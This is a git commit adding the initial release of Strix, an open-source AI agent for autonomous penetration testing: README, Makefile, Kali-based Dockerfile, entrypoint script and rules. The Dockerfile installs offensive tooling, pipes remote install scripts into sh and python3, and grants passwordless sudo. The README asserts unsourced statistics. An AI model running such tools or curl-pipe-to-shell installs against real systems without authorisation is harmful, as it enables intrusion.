Open-source release for Alpha version

This commit is contained in:
Ahmed Allam
2025-08-08 20:36:44 -07:00
commit 81ac98e8b9
105 changed files with 22125 additions and 0 deletions

View File

@@ -0,0 +1,126 @@
---
description:
globs:
alwaysApply: true
---
# Strix Cybersecurity Agent - Project Rules
## Project Overview
### Goal and Purpose
Strix is a sophisticated cybersecurity agent specialized in vulnerability scanning and security assessment. It provides:
- Automated cybersecurity scans and assessments
- Web application security testing
- Infrastructure vulnerability analysis
- Comprehensive security reporting
- RESTful API for scan management
- CLI interface for direct usage
The project implements an AI-powered ReAct (Reasoning and Acting) framework for autonomous security testing.
## Project Structure
### High-Level Architecture
```
strix-agent/
├── strix/ # Core application package
│ ├── agents/ # AI agent implementations
│ ├── api/ # FastAPI web service
│ ├── cli/ # Command-line interface
│ ├── llm/ # Language model configurations
│ └── tools/ # Security testing tools
├── tests/ # Test suite
├── evaluation/ # Evaluation framework
├── containers/ # Docker configuration
└── docs/ # Documentation
```
### Low-Level Structure
#### Core Components
- **[strix/agents/StrixAgent/strix_agent.py](mdc:strix/agents/StrixAgent/strix_agent.py)** - Main cybersecurity agent
- **[strix/agents/base_agent.py](mdc:strix/agents/base_agent.py)** - Base agent framework
- **[strix/api/main.py](mdc:strix/api/main.py)** - FastAPI application entry point
- **[strix/cli/main.py](mdc:strix/cli/main.py)** - CLI entry point
- **[pyproject.toml](mdc:pyproject.toml)** - Project configuration and dependencies
#### API Structure
- **[strix/api/routers/](mdc:strix/api/routers)** - API endpoint definitions
- **[strix/api/models/](mdc:strix/api/models)** - Pydantic data models
- **[strix/api/services/](mdc:strix/api/services)** - Business logic services
#### Security Tools
- **[strix/tools/browser/](mdc:strix/tools/browser)** - Web browser automation
- **[strix/tools/terminal/](mdc:strix/tools/terminal)** - Terminal command execution
- **[strix/tools/python/](mdc:strix/tools/python)** - Python code execution
- **[strix/tools/web_search/](mdc:strix/tools/web_search)** - Web reconnaissance
- **[strix/tools/reporting/](mdc:strix/tools/reporting)** - Security report generation
## Development Guidelines
### Code Standards
- **Simplicity**: Write simple, clean, and modular code
- **Functionality**: Prefer functional programming patterns where appropriate
- **Efficiency**: Optimize for performance without premature optimization
- **No Bloat**: Avoid unnecessary complexity or over-engineering
- **Minimal Comments**: Code should be self-documenting; use comments sparingly for complex business logic only
### Code Quality Requirements
- All code MUST pass `make pre-commit` checks
- All code MUST pass Ruff linting without warnings
- All code MUST pass MyPy type checking without errors
- Type hints are required for all function signatures
- Follow the strict configuration in [pyproject.toml](mdc:pyproject.toml)
### Execution Environment
- **ALWAYS** use `poetry run` for executing Python scripts and commands
- **NEVER** run Python directly with `python` command
- Use `poetry run strix-agent` for CLI operations
- Use `poetry run uvicorn strix.api.main:app` for API server
### File Management Rules
- **DO NOT** create or edit README.md or any .md documentation files unless explicitly requested
- Focus on code implementation, not documentation
- Keep docstrings concise and functional
### Testing and Quality Assurance
- Run `make pre-commit` before any commits
- Ensure all tests pass with `poetry run pytest`
- Use `poetry run mypy .` for type checking
- Use `poetry run ruff check .` for linting
### Dependencies
- All dependencies managed through [pyproject.toml](mdc:pyproject.toml)
- Use Poetry for dependency management
- Pin versions for production dependencies
- Keep dev dependencies in separate group
### Configuration
- Application settings in [strix/api/core/config.py](mdc:strix/api/core/config.py)
- LLM configuration in [strix/llm/config.py](mdc:strix/llm/config.py)
- Agent system prompts in [strix/agents/StrixAgent/system_prompt.jinja](mdc:strix/agents/StrixAgent/system_prompt.jinja)
## Key Implementation Patterns
### Agent Framework
- Inherit from BaseAgent for new agent implementations
- Use ReAct pattern for reasoning and action loops
- Implement tools through the registry system in [strix/tools/registry.py](mdc:strix/tools/registry.py)
### API Development
- Use FastAPI with Pydantic models
- Implement proper error handling and validation
- Follow REST conventions for endpoints
- Use Beanie ODM for MongoDB operations
### Security Tools
- Implement tools as action classes with clear interfaces
- Use async/await for I/O operations
- Implement proper cleanup and resource management
- Follow principle of least privilege
### Error Handling
- Use structured exception handling
- Provide meaningful error messages
- Log errors appropriately without exposing sensitive information
- Implement graceful degradation where possible

BIN
.github/screenshot.png vendored Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 679 KiB

98
.gitignore vendored Normal file
View File

@@ -0,0 +1,98 @@
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
# Virtual Environment
venv/
env/
ENV/
.env
.venv
pip-log.txt
pip-delete-this-directory.txt
# IDE
.idea/
.vscode/
*.swp
*.swo
.DS_Store
.project
.pydevproject
.settings/
# Testing
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
htmlcov/
# FastAPI
.env.local
.env.development.local
.env.test.local
.env.production.local
# MongoDB
data/
mongod.log
*.mongodb
*.mongorc.js
# LLM and ML related
*.bin
*.pt
*.pth
*.onnx
*.h5
*.hdf5
*.pkl
*.joblib
wandb/
runs/
checkpoints/
logs/
tensorboard/
# Agent execution traces
agent_runs/
# Misc
*.log
*.sqlite
*.db
.directory
*.bak
*.tmp
*.temp
.DS_Store
Thumbs.db
*.schema.graphql
schema.graphql
.opencode/

62
.pre-commit-config.yaml Normal file
View File

@@ -0,0 +1,62 @@
repos:
# Ruff for fast linting and formatting
- repo: https://github.com/astral-sh/ruff-pre-commit
rev: v0.11.13
hooks:
- id: ruff
args: [--fix, --exit-non-zero-on-fix]
name: ruff-lint
- id: ruff-format
name: ruff-format
# MyPy for static type checking
- repo: https://github.com/pre-commit/mirrors-mypy
rev: v1.16.0
hooks:
- id: mypy
additional_dependencies: [
types-requests,
types-python-dateutil,
pydantic,
fastapi,
]
args: [--install-types, --non-interactive]
# Built-in hooks for basic file checks
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v5.0.0
hooks:
- id: trailing-whitespace
- id: end-of-file-fixer
- id: check-toml
- id: check-merge-conflict
- id: check-added-large-files
- id: debug-statements
- id: check-case-conflict
- id: check-docstring-first
# Security checks with bandit
- repo: https://github.com/PyCQA/bandit
rev: 1.8.3
hooks:
- id: bandit
args: [-c, pyproject.toml]
# Additional Python code quality checks
- repo: https://github.com/asottile/pyupgrade
rev: v3.20.0
hooks:
- id: pyupgrade
args: [--py312-plus]
ci:
autofix_commit_msg: |
[pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
autofix_prs: true
autoupdate_branch: ""
autoupdate_commit_msg: "[pre-commit.ci] pre-commit autoupdate"
autoupdate_schedule: weekly
skip: []
submodules: false

201
LICENSE Normal file
View File

@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright 2025 OmniSecure Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

90
Makefile Normal file
View File

@@ -0,0 +1,90 @@
.PHONY: help install dev-install format lint type-check test test-cov clean pre-commit setup-dev
help:
@echo "Available commands:"
@echo " setup-dev - Install all development dependencies and setup pre-commit"
@echo " install - Install production dependencies"
@echo " dev-install - Install development dependencies"
@echo ""
@echo "Code Quality:"
@echo " format - Format code with ruff"
@echo " lint - Lint code with ruff and pylint"
@echo " type-check - Run type checking with mypy and pyright"
@echo " security - Run security checks with bandit"
@echo " check-all - Run all code quality checks"
@echo ""
@echo "Testing:"
@echo " test - Run tests with pytest"
@echo " test-cov - Run tests with coverage reporting"
@echo ""
@echo "Development:"
@echo " pre-commit - Run pre-commit hooks on all files"
@echo " clean - Clean up cache files and artifacts"
install:
poetry install --only=main
dev-install:
poetry install --with=dev
setup-dev: dev-install
poetry run pre-commit install
@echo "✅ Development environment setup complete!"
@echo "Run 'make check-all' to verify everything works correctly."
format:
@echo "🎨 Formatting code with ruff..."
poetry run ruff format .
@echo "✅ Code formatting complete!"
lint:
@echo "🔍 Linting code with ruff..."
poetry run ruff check . --fix
@echo "📝 Running additional linting with pylint..."
poetry run pylint strix/ --score=no --reports=no
@echo "✅ Linting complete!"
type-check:
@echo "🔍 Type checking with mypy..."
poetry run mypy strix/
@echo "🔍 Type checking with pyright..."
poetry run pyright strix/
@echo "✅ Type checking complete!"
security:
@echo "🔒 Running security checks with bandit..."
poetry run bandit -r strix/ -c pyproject.toml
@echo "✅ Security checks complete!"
check-all: format lint type-check security
@echo "✅ All code quality checks passed!"
test:
@echo "🧪 Running tests..."
poetry run pytest -v
@echo "✅ Tests complete!"
test-cov:
@echo "🧪 Running tests with coverage..."
poetry run pytest -v --cov=strix --cov-report=term-missing --cov-report=html
@echo "✅ Tests with coverage complete!"
@echo "📊 Coverage report generated in htmlcov/"
pre-commit:
@echo "🔧 Running pre-commit hooks..."
poetry run pre-commit run --all-files
@echo "✅ Pre-commit hooks complete!"
clean:
@echo "🧹 Cleaning up cache files..."
find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true
find . -type d -name ".pytest_cache" -exec rm -rf {} + 2>/dev/null || true
find . -type d -name ".mypy_cache" -exec rm -rf {} + 2>/dev/null || true
find . -type d -name ".ruff_cache" -exec rm -rf {} + 2>/dev/null || true
find . -type d -name "htmlcov" -exec rm -rf {} + 2>/dev/null || true
find . -name "*.pyc" -delete 2>/dev/null || true
find . -name ".coverage" -delete 2>/dev/null || true
@echo "✅ Cleanup complete!"
dev: format lint type-check test
@echo "✅ Development cycle complete!"

157
README.md Normal file
View File

@@ -0,0 +1,157 @@
<div align="center">
# Strix
### Open-source AI hackers for your apps
[![Apache 2.0](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)
[![Vercel AI Accelerator 2025](https://img.shields.io/badge/Vercel%20AI-Accelerator%202025-000000?style=flat&logo=vercel)](https://vercel.com/ai-accelerator)
[![Status: Alpha](https://img.shields.io/badge/status-alpha-orange.svg)](https://github.com/usestrix/strix)
[![Discord](https://dcbadge.limes.pink/api/server/yduEyduBsp?style=flat)](https://discord.gg/yduEyduBsp)
**⚡ Use it to hack your apps before the bad guys do ⚡**
</div>
<div align="center">
<img src=".github/screenshot.png" alt="Strix Demo" width="800" style="border-radius: 16px; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3), 0 0 0 1px rgba(255, 255, 255, 0.1), inset 0 1px 0 rgba(255, 255, 255, 0.2); transform: perspective(1000px) rotateX(2deg); transition: transform 0.3s ease;">
</div>
---
## 🚨 The AI Security Crisis
Everyone's shipping code faster than ever. Cursor, Windsurf, and Claude made coding easy - but QA and security testing are now the real bottlenecks.
> **Number of security vulnerabilities doubled post-AI.**
Traditional security tools weren't designed for this. SAST was a temporary fix when manual pentesting cost $10k+ and took weeks. Now, Strix delivers real security testing rapidly.
**The solution:** Enable developers to use AI coding at full speed, without compromising on security.
## 🦉 Strix Overview
Strix are autonomous AI agents that act just like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual exploitation. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.
### 🚀 Quick Start
```bash
# Install
pipx install strix-agent
# Configure AI provider
export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
export LLM_API_KEY="your-api-key"
# Run security assessment
strix --target ./app-directory
```
## Why Use Strix
- **Full Hacker Arsenal** - All the tools a professional hacker needs, built into the agents
- **Real Validation** - Dynamic testing and actual exploitation, thus much fewer false positives
- **Developer-First** - Seamlessly integrates into existing development workflows
- **Auto-Fix & Reporting** - Automated patching with detailed remediation and security reports
## ✨ Features
### 🛠️ Agentic Security Tools
- **🔌 Full HTTP Proxy** - Full request/response manipulation and analysis
- **🌐 Browser Automation** - Multi-tab browser for testing of XSS, CSRF, auth flows
- **💻 Terminal Environments** - Interactive shells for command execution and testing
- **🐍 Python Runtime** - Custom exploit development and validation
- **🔍 Reconnaissance** - Automated OSINT and attack surface mapping
- **📁 Code Analysis** - Static and dynamic analysis capabilities
- **📝 Knowledge Management** - Structured findings and attack documentation
### 🎯 Comprehensive Vulnerability Detection
- **Access Control** - IDOR, privilege escalation, auth bypass
- **Injection Attacks** - SQL, NoSQL, command injection
- **Server-Side** - SSRF, XXE, deserialization flaws
- **Client-Side** - XSS, prototype pollution, DOM vulnerabilities
- **Business Logic** - Race conditions, workflow manipulation
- **Authentication** - JWT vulnerabilities, session management
- **Infrastructure** - Misconfigurations, exposed services
### 🕸️ Graph of Agents
- **Distributed Workflows** - Specialized agents for different attacks and assets
- **Scalable Testing** - Parallel execution for fast comprehensive coverage
- **Dynamic Coordination** - Agents collaborate and share discoveries
## 💻 Usage Examples
```bash
# Local codebase analysis
strix --target ./app-directory
# Repository security review
strix --target https://github.com/org/repo
# Web application assessment
strix --target https://your-app.com
# Focused testing
strix --target api.your-app.com --instruction "Prioritize authentication and authorization testing"
```
### ⚙️ Configuration
```bash
# Required
export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
export LLM_API_KEY="your-api-key"
# Recommended
export PERPLEXITY_API_KEY="your-api-key"
```
[📚 View supported AI models](https://docs.litellm.ai/docs/providers)
## 🏆 Enterprise Platform
Our managed platform provides:
- **📈 Executive Dashboards**
- **🧠 Custom Fine-Tuned Models**
- **⚙️ CI/CD Integration**
- **🔍 Large-Scale Scanning**
- **🔌 Third-Party Integrations**
- **🎯 Enterprise Support**
[**Get Enterprise Demo →**](https://form.typeform.com/to/ljtvl6X0)
## 🔒 Security Architecture
- **Container Isolation** - All testing in sandboxed Docker environments
- **Local Processing** - Testing runs locally, no data sent to external services
> [!NOTE]
> Strix is currently in Alpha. Expect rapid updates and improvements.
> [!WARNING]
> Only test systems you own or have permission to test. You are responsible for using Strix ethically and legally.
## 🌟 Support the Project
**Love Strix?** Give us a ⭐ on GitHub!
## 👥 Join Our Community
Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/yduEyduBsp)**
---
<div align="center">
### About • Links
**[OmniSecure Inc.](https://omnisecure.ai)** • Applied AI Research Lab
[Discord Community](https://discord.gg/yduEyduBsp) • [Enterprise Solutions](https://form.typeform.com/to/ljtvl6X0) • [Report Issues](https://github.com/usestrix/strix/issues)
</div>

190
containers/Dockerfile Normal file
View File

@@ -0,0 +1,190 @@
FROM kalilinux/kali-rolling:latest
LABEL description="AI Agent Penetration Testing Environment with Comprehensive Automated Tools"
RUN apt-get update && \
apt-get install -y kali-archive-keyring sudo && \
apt-get update && \
apt-get upgrade -y
RUN useradd -m -s /bin/bash pentester && \
usermod -aG sudo pentester && \
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
RUN mkdir -p /home/pentester/configs \
/home/pentester/wordlists \
/home/pentester/output \
/home/pentester/scripts \
/home/pentester/tools \
/app/runtime \
/app/tools \
/app/certs && \
chown -R pentester:pentester /app/certs /home/pentester/tools
RUN apt-get update && \
apt-get install -y --no-install-recommends \
wget curl git vim nano unzip tar \
apt-transport-https ca-certificates gnupg lsb-release \
build-essential software-properties-common \
gcc libc6-dev pkg-config libpcap-dev libssl-dev \
python3 python3-pip python3-dev python3-venv python3-setuptools \
golang-go \
net-tools dnsutils whois \
jq parallel ripgrep grep \
less man-db procps htop \
iproute2 iputils-ping netcat-traditional \
nmap ncat ndiff \
sqlmap nuclei subfinder naabu ffuf \
nodejs npm pipx \
libcap2-bin \
gdb \
libnss3 libnspr4 libdbus-1-3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libatspi2.0-0 \
libxcomposite1 libxdamage1 libxfixes3 libxrandr2 libgbm1 libxkbcommon0 libpango-1.0-0 libcairo2 libasound2 \
fonts-unifont fonts-noto-color-emoji fonts-freefont-ttf fonts-dejavu-core ttf-bitstream-vera \
libnss3-tools
RUN setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
USER pentester
RUN openssl ecparam -name prime256v1 -genkey -noout -out /app/certs/ca.key && \
openssl req -x509 -new -key /app/certs/ca.key \
-out /app/certs/ca.crt \
-days 3650 \
-subj "/C=US/ST=CA/O=Security Testing/CN=Testing Root CA" \
-addext "basicConstraints=critical,CA:TRUE" \
-addext "keyUsage=critical,digitalSignature,keyEncipherment,keyCertSign" && \
openssl pkcs12 -export \
-out /app/certs/ca.p12 \
-inkey /app/certs/ca.key \
-in /app/certs/ca.crt \
-passout pass:"" \
-name "Testing Root CA" && \
chmod 644 /app/certs/ca.crt && \
chmod 600 /app/certs/ca.key && \
chmod 600 /app/certs/ca.p12
USER root
RUN cp /app/certs/ca.crt /usr/local/share/ca-certificates/ca.crt && \
update-ca-certificates
RUN curl -sSL https://install.python-poetry.org | POETRY_HOME=/opt/poetry python3 - && \
ln -s /opt/poetry/bin/poetry /usr/local/bin/poetry && \
chmod +x /usr/local/bin/poetry && \
python3 -m venv /app/venv && \
chown -R pentester:pentester /app/venv /opt/poetry
USER pentester
WORKDIR /tmp
RUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/cvemap/cmd/vulnx@latest && \
go install -v github.com/jaeles-project/gospider@latest && \
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
RUN nuclei -update-templates
RUN pipx install arjun && \
pipx install dirsearch && \
pipx inject dirsearch setuptools && \
pipx install wafw00f
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
RUN mkdir -p /home/pentester/.npm-global
RUN npm install -g retire@latest && \
npm install -g eslint@latest && \
npm install -g js-beautify@latest
WORKDIR /home/pentester/tools
RUN git clone https://github.com/aravind0x7/JS-Snooper.git && \
chmod +x JS-Snooper/js_snooper.sh && \
git clone https://github.com/xchopath/jsniper.sh.git && \
chmod +x jsniper.sh/jsniper.sh && \
git clone https://github.com/ticarpi/jwt_tool.git && \
chmod +x jwt_tool/jwt_tool.py
USER root
RUN curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin
RUN apt-get update && apt-get install -y zaproxy
RUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
RUN apt-get install -y wapiti
USER pentester
RUN pipx install semgrep && \
pipx install bandit
RUN npm install -g jshint
USER root
RUN apt-get autoremove -y && \
apt-get autoclean && \
rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
ENV PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:/app/venv/bin:$PATH"
ENV VIRTUAL_ENV="/app/venv"
ENV POETRY_HOME="/opt/poetry"
WORKDIR /app
RUN ARCH=$(uname -m) && \
if [ "$ARCH" = "x86_64" ]; then \
CAIDO_ARCH="x86_64"; \
elif [ "$ARCH" = "aarch64" ] || [ "$ARCH" = "arm64" ]; then \
CAIDO_ARCH="aarch64"; \
else \
echo "Unsupported architecture: $ARCH" && exit 1; \
fi && \
wget -O caido-cli.tar.gz https://caido.download/releases/v0.48.0/caido-cli-v0.48.0-linux-${CAIDO_ARCH}.tar.gz && \
tar -xzf caido-cli.tar.gz && \
chmod +x caido-cli && \
rm caido-cli.tar.gz && \
mv caido-cli /usr/local/bin/
ENV STRIX_SANDBOX_MODE=true
ENV PYTHONPATH=/app
ENV REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
ENV SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
RUN mkdir -p /shared_workspace /workspace && chown -R pentester:pentester /shared_workspace /workspace /app
COPY pyproject.toml poetry.lock ./
USER pentester
RUN poetry install --no-root --without dev
RUN poetry run playwright install chromium
RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt && \
ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool
RUN echo "# Sandbox Environment" > README.md
COPY strix/__init__.py strix/
COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
COPY strix/tools/browser/ /app/strix/tools/browser/
COPY strix/tools/file_edit/ /app/strix/tools/file_edit/
COPY strix/tools/notes/ /app/strix/tools/notes/
COPY strix/tools/python/ /app/strix/tools/python/
COPY strix/tools/terminal/ /app/strix/tools/terminal/
COPY strix/tools/proxy/ /app/strix/tools/proxy/
RUN echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.bashrc && \
echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.profile
USER root
COPY containers/docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
RUN chmod +x /usr/local/bin/docker-entrypoint.sh
USER pentester
WORKDIR /workspace
ENTRYPOINT ["docker-entrypoint.sh"]

View File

@@ -0,0 +1,128 @@
#!/bin/bash
set -e
if [ -z "$CAIDO_PORT" ] || [ -z "$STRIX_TOOL_SERVER_PORT" ]; then
echo "Error: CAIDO_PORT and STRIX_TOOL_SERVER_PORT must be set."
exit 1
fi
caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
--allow-guests \
--no-logging \
--no-open \
--import-ca-cert /app/certs/ca.p12 \
--import-ca-cert-pass "" > /dev/null 2>&1 &
echo "Waiting for Caido API to be ready..."
for i in {1..30}; do
if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
echo "Caido API is ready."
break
fi
sleep 1
done
sleep 2
echo "Fetching API token..."
TOKEN=$(curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
echo "Failed to get API token from Caido."
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
exit 1
fi
export CAIDO_API_TOKEN=$TOKEN
echo "Caido API token has been set."
echo "Creating a new Caido project..."
CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
PROJECT_ID=$(echo $CREATE_PROJECT_RESPONSE | jq -r '.data.createProject.project.id')
if [ -z "$PROJECT_ID" ] || [ "$PROJECT_ID" == "null" ]; then
echo "Failed to create Caido project."
echo "Response: $CREATE_PROJECT_RESPONSE"
exit 1
fi
echo "Caido project created with ID: $PROJECT_ID"
echo "Selecting Caido project..."
SELECT_RESPONSE=$(curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
SELECTED_ID=$(echo $SELECT_RESPONSE | jq -r '.data.selectProject.currentProject.project.id')
if [ "$SELECTED_ID" != "$PROJECT_ID" ]; then
echo "Failed to select Caido project."
echo "Response: $SELECT_RESPONSE"
exit 1
fi
echo "✅ Caido project selected successfully."
echo "Configuring system-wide proxy settings..."
